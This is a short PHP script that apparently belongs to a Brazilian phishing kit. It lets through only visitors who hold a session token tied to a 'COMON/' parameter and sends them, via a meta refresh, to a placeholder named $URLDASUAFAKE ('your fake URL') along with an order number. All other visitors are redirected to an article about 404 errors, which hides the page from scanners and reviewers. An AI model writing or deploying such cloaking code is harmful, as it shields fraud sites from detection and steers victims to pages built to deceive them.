<?php

if(isset($_GET['COMON/']) && ISSET($_GET["code"])){
	$p = $_GET['COMON/'];
	
	if(isset($_SESSION[$p]) && $_SESSION[$p] == $p){ 
	
	

$urlpega = base64_decode($_GET['code']);
$pedidopega = $_GET['num'];
$file= $urlpega;

$urli = $URLDASUAFAKE.'/?COMON/=SEND&code='.$pedidopega;


echo '<META http-equiv="refresh" content="2;URL='.$urli.'">';



 }else{
	
		Header( "Location: https://www.techtudo.com.br/listas/2018/07/o-que-e-erro-404-veja-significado-dos-problemas-mais-comuns.ghtml" );
}


}else{
	
		Header( "Location: https://www.techtudo.com.br/listas/2018/07/o-que-e-erro-404-veja-significado-dos-problemas-mais-comuns.ghtml" );
	
} ?>